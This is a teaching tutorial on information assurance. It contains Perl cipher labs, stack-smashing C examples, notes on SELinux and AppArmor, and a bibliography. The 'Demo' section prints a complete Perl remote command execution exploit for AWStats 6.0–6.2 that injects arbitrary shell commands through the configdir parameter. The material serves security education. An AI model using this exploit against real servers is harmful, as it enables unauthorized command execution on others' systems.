Tutorial on Adding Information Assurance to the Curriculum
Richard Weiss* and Isaac Overcast
The Evergreen State College
Topics to explore
- Cryptography: Caesar cipher, Vigenere, RSA, cracking passwords
- Network protocols and tools: Open SSL, viruses, worms, DOS, TCP SYN flooding
- Assembly Language: stack smashing
- Secure OS: SELinux, AppArmor (SUSE)
- Database: translucent databases
- Technology and society,
Labs that I have prepared:
- programming ciphers in Perl
- stack smashing and assembly language
- using nmap, Metasploit, and other network tools
Symmetric Ciphers in Perl
Lab1
- about Perl: scalar variables start with $,
$var = <STDIN>;
will read a line from the keyboard
- programming Caesar cipher
there is a concise way to do substitution in Perl:
$Text =~ tr/a-zA-Z/b-zaB-ZA/;
- program a vigenere cipher
perl has split(//, $text), ord, chr
arrays variables begin with @
@num_array = split(/ /, $num);
Program:
#!/usr/bin/perl
# Lab 1
# modify the following script
# to prompt the user for the plaintext and get it from the
# keyboard using <STDIN>.
# Then encrypt the plaintext with a Caesar cipher using a key
# also input using <STDIN>
# expand this program to include a vigenere cipher:
# prompt the user for a key and the plain text
$Text = "EASTERN WASHINGTON UNIVERSITY";
$key = 3;
#$Text =~ tr/a-zA-Z/d-za-cD-ZA-C/;
for ($i=0; $i<$key; $i++) {
$Text =~ tr/a-zA-Z/b-zaB-ZA/;
}
print $Text."\n";
Lab 2
The following examples were taken from "Stack Smashing for Fun and Profit" However, the second one doesn't seem to
work. You need to experiment with core dumps to see what is going on, or use print statements for
the memory addresses.
-
/***************************
example2.c
stack smashing,
simple buffer overflow
Oct, 2006
**************************/
void overflow(char *str) {
char buffer[16];
strcpy(buffer, str);
}
/*******************
main
******************/
void main() {
char large_string[256];
int i;
for (i=0; i<256; i++) {
large_string[i] = 'A';
}
overflow(large_string);
}
-
/***************************
example3.c
stack smashing,
buffer overflow
Oct, 2006
**************************/
void overflow(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
/*******************
main
******************/
int main() {
int x;
x = 0;
overflow(1,2,3);
x = 1;
printf("%d\n", x);
return -1;
}
Demo
Metasploit allows you to write perl scripts to automate exploits. An example of a perl script
that comes with the Metasploit download is an exploit for awstats, shown below.
#!/usr/bin/perl
#---GHC------------------------------#
#Remote command execution exploit #
#Product: #
#Advanced Web Statistics 6.0 - 6.2 #
#URL:http://awstats.sourceforge.net #
#Greets & respects to our friends: #
#1dt.w0lf and all rst.void.ru #
#Special greets 2 d0G4 #
#& cr0n for link on bugtraq #
#---not-PRIVATE-already--------------#
# bug found by iDEFENSE #
# http://www.idefense.com/ #
# application/poi/display? #
# id=185&type=vulnerabilities #
# &flashstatus=true #
#------------------------------------#
use IO::Socket;
$banner = "
#################################################################
GHC 2005
Remote command execution exploit for:
Advanced Web Statistics 6.0 - 6.2
Usage:
>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\"
#################################################################
";
$bug_param = 'configdir';
$id_start = 'b_exp';
$id_exit = 'e_exp';
$id_print = 0;
$http_head = "\n\n";
sub Print_Report {
$str = $_[0];
if ($str =~ m/$id_exit/i) {
exit;
}
if ($str =~ m/$id_start/i) {
$str =~ s/$id_start//ig;
$id_print = 1;
}
if ($id_print == 1) {
print "$str";
}
}
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($report = <$socket>) {
&Print_Report("$report");
}
}
print "$banner";
if ($ARGV[0] && $ARGV[1] && $ARGV[2]) {
$server = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2]; }
else {
exit;
}
$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
$expl =~ s/\W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;
Secure OS
The problem
The main problem seems to be that in traditional OS's, some programs need to run
with root or administrator privileges in order to perform their tasks, e.g. reading and writing e-mail
files. What you want is finer granularity to give programs power to access hardware,
create other processes, and access specific files and directories, without giving them
omnipotence.
Mandatory Access Control and SELinux
With MAC, the only thing the superuser account is used for is maintaining the global security policy. This
makes it much more difficult to compromise the system and usually requires physical access.
SELinux implements three different types of MAC:
- Type enforcement (TE): every system object has a security type.
- Role-based access controls (RBACs): users are assigned roles, which define the actions and
contexts in which that user can participate
- Multi-level security (MLS): defines access controls against objects based on data classification
(sensitivity).
Major system applications must be SELinux-aware wherever possible, and it also requires extensive setup by a
knowledgeable system administrator (that is, one who has carefully researched SELinux). On the one hand,
SELinux is truly comprehensive. On the other hand, configuring it is a fairly major undertaking.
AppArmor
"Novell AppArmor has a more modest objective: to restrict the behavior of selected applications in a
very granular but targeted way. In focusing on applications (at the expense of roles and data classification),
AppArmor is built on the assumption that the single biggest attack vector on most systems is application
vulnerabilities. If the application's behavior is restricted, the behavior of any attacker who succeeds
in exploiting some vulnerability in that application also will be restricted."
Bibliography
- Aleph One, Smashing the stack for fun and profit, 2001,
http://reactor-core.org/stack-smashing.html, retrieved June 2006.
- CERT, TCP SYN flooding and IP spoofing attack, 1996,
http://www.cert.org/advisories/CA-1996-21.html, retrieved June 2006.
- Baase, Sara, A Gift of Fire, Prentice Hall, 2003.
- Bijtlich, The Tao of Network Security Monitoring, Addison-Wesley, 2004
- Brumley, D., Invisible intruders: rootkits in practice, 1999,
www.usenix.org/publications/login/1999-9/features/rootkits.html, retrieved June 2006.
- Easttom, C., Computer Security Fundamentals, New Jersey, Prentice Hall, 2006.
- Erickson, Jon, Hacking: the Art of Exploitation, No Starch Press, 2003.
- Garfinkel, S., Spafford, G., Practical Unix & Internet Security, O'Reilly, 1996.
- Guttman, J.D. et al. Verifying information flow goals in security-enhanced Linux, 2004, www.ccs.neu.edu/home/guttman/selinux.pdf , retrieved June 2006.
- Hoglund, G., McGraw, G., Exploiting Software, Boston, Addison-Wesley, 2004.
- Kahn, D., The Codebreakers, Scribner, 1967.
- Mel, H.X., Baker, D., Cryptography Decrypted, Addison-Wesley, 2001.
- Menezes, Oorshot, Vanstone, Handbook of Applied Cryptography
- O'Harrell, R., No Place to Hide, New York, Free Press, 2005.
- Rosen, K., Discrete Mathematics and Its Applications, New York, McGraw Hill, 2003.
- Schneier, B., Applied Cryptography, New York, John Wiley and Sons, 1996.
- Singh, S. The Code Book, New York, Anchor Books, 1999.
- Stoll, C., The Cuckoo's Egg, New York, Pocket Books, 1990.
- Wayner, P., Translucent Databases, Baltimore, Flyzone Press, 2002
Acknowledgements
Richard Weiss was supported by NSF grant 0416630